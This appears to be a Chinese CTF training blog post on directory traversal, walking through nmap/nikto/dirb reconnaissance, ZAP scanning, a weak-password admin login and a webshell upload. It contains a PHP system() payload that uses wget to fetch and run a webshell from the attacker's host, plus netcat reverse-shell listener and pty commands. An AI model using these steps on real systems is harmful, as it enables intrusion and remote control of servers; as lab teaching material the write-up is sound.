CTF训练 web安全目录遍历

目录遍历漏洞介绍

路径遍历攻击(也称为目录遍历)旨在访问存储在Web根文件夹之外的文件和目录。通过操纵带有“点-斜线(…)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。
需要注意的是,系统操作访问控制(如在微软Windows操作系统上锁定或使用文件)限制了对文件的访问权限。
这种攻击也称为“点-点斜线”、“目录遍历”、“目录爬升”和“回溯”。

信息探测

这次只说一下信息探测的以往的语法:

扫描主机服务信息以及服务版本
nmap -sV 靶场IP地址

快速扫描主机全部信息
nmap -T4 –A -v 靶场IP地址

探测敏感信息
nikto -host http://靶场IP地址:端口
目录信息探测 dirb http://靶场IP:端口

深入挖掘

分析nmap 、nikto扫描结果,并对结果进行分析,挖掘可以利用的信息;
例如:端口开放的http服务要充分利用。
敏感目录
一些url(dbadmin、php)等一些敏感词汇。

接着使用浏览器打开 http://ip:port/敏感页面,查看敏感信息,找到可利用的位置;

漏洞扫描

owasp-zap web漏洞扫描器,自动挖掘web应用程序中的漏洞

打开终端输入owasp-zap 会出现一下所示:
在这里插入图片描述在这里插入图片描述
然后利用扫描器进行扫描,扫描完毕之后,alerts选项如果出现红色图标那就证明是高危漏洞。点击会出现目录信息。即目录遍历漏洞。

分析漏洞扫描结果

利用目录遍历漏洞获取shell思路:

上传webshell到服务器,之后通过对应的目录遍历路径访问webshell,执行webshell。在kali linux当中获取反弹shell;

敏感页面上传shell

dbadmin 敏感目录有敏感页面,浏览器访问,使用弱口令尝试登陆;
使用admin进行登录可以进入系统后台。

登陆页面之后 查找可利用的写webshell的点;

使用/usr/share/webshells/php/下的webshell
打开终端输入 cd /usr/share/webshells/php 打开该目录,然后使用ls进行查看webshell

利用cp 文件名/root/Desktop进行下载到桌面。

然后利用cd ls gedit进行查看下载内容(也可以进行修改其内容:IP地址修改为攻击机的IP地址ifconfig进行查看,端口号可以随意修改)。

修改webshell名称:```mv 文件名 修改后的文件名``

在系统后台新建数据库,数据表,字段(写入<?php system(“cd /tmp;wget http://ip:port/webshell.php;chmod +x webshell.php;php webshell”);?>)
在这里插入图片描述
进行如上操作进行写入。便于复制粘贴上传webshell。

监听反弹shell

创建服务器用于靶场机器下载对应webshell

python –m “SimpleHTTPServer”

启动监听 nc
nc –nlvp 端口号
端口号为上述自己修改的端口号。

输入id进行查看对应的权限

启动终端
python –c “import pty;pty.spawn(‘/bin/bash’)”

返回对应的终端

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值